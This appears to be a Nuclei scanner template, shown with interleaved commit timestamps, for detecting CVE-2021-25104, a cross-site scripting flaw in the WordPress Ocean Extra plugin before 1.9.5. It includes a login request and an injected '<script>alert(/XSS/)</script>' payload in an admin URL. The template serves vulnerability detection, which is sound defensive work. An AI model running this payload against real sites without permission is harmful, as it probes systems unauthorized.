2022-09-23 03:38:10 +00:00
id : CVE-2021-25104
info :
2022-09-29 13:38:41 +00:00
name : WordPress Ocean Extra <1.9.5 - Cross-Site Scripting
2022-09-23 03:38:10 +00:00
author : Akincibor
2022-09-29 13:52:24 +00:00
severity : medium
2022-09-29 13:38:41 +00:00
description : WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.
2022-09-23 03:38:10 +00:00
reference :
- https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
2022-09-23 08:18:13 +00:00
- https://wordpress.org/plugins/ocean-extra/
2022-09-23 03:38:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-25104
2022-09-29 13:38:41 +00:00
remediation : Fixed in version 1.9.5.
2022-09-23 10:35:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2021-25104
cwe-id : CWE-79
2022-09-23 03:38:10 +00:00
metadata :
2022-09-23 10:35:57 +00:00
verified : "true"
2022-09-23 08:18:13 +00:00
tags : cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra
2022-09-23 03:38:10 +00:00
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'OceanWP'
- '><script>alert(/XSS/)</script>'
condition : and
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28